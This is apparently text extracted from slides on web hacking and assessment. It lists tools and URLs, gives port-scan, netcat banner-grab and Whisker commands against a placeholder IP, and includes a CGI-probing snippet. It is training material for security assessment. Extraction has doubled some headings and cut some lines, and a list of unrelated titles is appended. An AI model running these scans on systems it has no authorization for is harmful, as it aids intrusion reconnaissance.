• WebProxy -www.atstake.com/research/tools/index.html

• HTTPush - httpush.sourceforge.net

• Achilles - www.digizen-security.com/downloads.html

• MiniBrowser - aignes.com/download.htm

• Some good things:– Completeness– Large knowledge bases (at least possibly)

• Puts Web security assessment into the hands of anyone who calls themselves a “Information Security Expert”.

Why Automated Tools Why Automated Tools Don’t Work Very WellDon’t Work Very Well

•Every programmer does things a little different

•Authentication schemes are hard to automate

•Error codes are not standardized•Sometimes simple things like SSL get in the

Why People are BetterWhy People are Better

•Recognition of subtle errors•We understand the impact and therefore

the risk of a vulnerability•We are grounded in the fundamentals of

Computer Science and therefore are able to find “real” bugs, flaws in logic

Web Hacking AccessoriesWeb Hacking Accessories

• Some helpful tools include….– A port scanner (Nmap et. al.)

www.insecure.org/nmap/

– Netcat; the network swiss army knife http://www.atstake.com/research/tools/network_utilities/

– A vulnerability scanner; Whisker http://www.wiretrip.net/rfp/p/doc.asp/i3/d21.htm

– Open SSL source and documentation• OpenSSL, RFC 2246

New tools on the New tools on the horizon…horizon…

• Nikto– CGI scanner, similar to whisker 1.4. Checks for CGIs,

common dirs, and old versions Database frequently updated http://www.cirt.net/

• WHArsenal– Set of CGIs that plug into an existing Apache install. Allows

for all kinds of requests, while controling/modifying request particulars. http://community.whitehatsec.com/

• @stake WebProxy– Assessment proxy with full fuzzer/rewriting capabilities.

Implemented in Java; supports Linux, Solaris, and Windows. http://www.atstake.com/

• Nessus– Has a few new interesting web assessment plugins which

do site crawling/mirroring and a few other interesting things. http://www.nessus.org/

Basic Training for Web Basic Training for Web Combat…Combat…

• Port scanning– Look for well-known TCP web ports.

• 80, 81, 443, 8000, 8080, etc…

• Using FScan (from Foundstone)fscan -p 80,81,443,8000,8080 10.0.0.1

• Using nmap (by Fyodor)nmap -p 80,81,443,8000,8080 10.0.0.1

• Fingerprinting – HTTP Banner grabbing.– netcat as a TCP client (even telnet works)

nc 10.0.0.1 80

HEAD / HTTP/1.0

• Advanced HTTP methods:– TRACE, OPTIONS, etc.

Shaking the tree for the low hanging fruit….

• Scan using a database of known web vulnerabilities.

• Whisker (by Rain Forest Puppy)./whisker.pl -h 10.0.0.1 -I 1

• cgichk.c<snip>"GET /cgi-bin/phf HTTP/1.0\n\n";"GET /cgi-bin/Count.cgi HTTP/1.0\n\n";"GET /cgi-bin/test-cgi HTTP/1.0\n\n";"GET /cgi-bin/php.cgi HTTP/1.0\n\n

• ISS, Cybercop, Retina, etc.

el33t hax0r Training for el33t hax0r Training for Web Combat…Web Combat…

What about SSL?

• Some SSL Myths:– “We are secure because we use SSL!”– “Strong 128 bit crypto being used”– “We use Digital Certificates signed by

VeriSign”

Proxy Over SSLProxy Over SSL• Using netcat and OpenSSL, it is possible

to create a simple two-line SSL Proxy!• Listen on port 80 on a host and redirect

requests to port 443 on a remote host through SSL.

SSLweb

server

Webclient

openssl

Assessment ToolsAssessment Tools

• Vulnerability scanners– Look for a known list of vulnerable

applications or technologies– Do not (can not) engage/scan custom

applications and configurations– General vulnerability scanners: ISS,

Cybercop, Nessus– Web-specific vulnerability scanners:

WebInspect, whisker

Assessment toolsAssessment tools

• ‘Proxy monitors’– HTTP proxy which monitors traffic, looking

for web vulnerabilities as they pass– Can analyze custom applications with the

help of a user– Examples: AppScan, RFProxy,

HTTPush, Achilles

Root Causes of Web Root Causes of Web HacksHacks

• Complex web architectures may cause oversight in web server configuration.

• URL Parsing.• File Canonicalization.• Combination of underlying operating

system and web server may leave holes.

Root Causes of Web Root Causes of Web HacksHacks

• Untested code used in web applications, to save time.

• Level of security consciousness low in web application developers.

• Security vs. convenience.• Security vs. time-to-market.• Zero knowledge administration breeds

zero knowledge administrators.

network security part ii: attacks network security part ii: attacks web attacks

security innovation

server slide

web file

web sql tampering web

majority of web applications

attacks web attacks

attacks network security

trouble prone areas

Documents

wireless lan security understanding and preventing network...

network security and spoofing attacks

replay attacks network systems security

network security attacks - routledge

real-life paradigms of wireless network security attacks

information and network security 10cs835€¦ ·...

lesson 8: network security and defending against attacks

network security and network attacks

internet security. outline what’s the problem? how...

global network security gmbh - firstterrorism - large scale...

network security attacks - thecat - web services overview

network security part ii: attacks backbone attacks

network security lecture 1: introduction attacks and risks

network security and dos attacks

simulation of attacks for security in wireless sensor...

1 network security basics. 2 what is network security? ...

1 network security cpsc6128 – lecture 2 attacks -...

security part one: network attacks and countermeasures xin...

network attacks, part 1 - university of california,...

simulation of computer network attacks - core security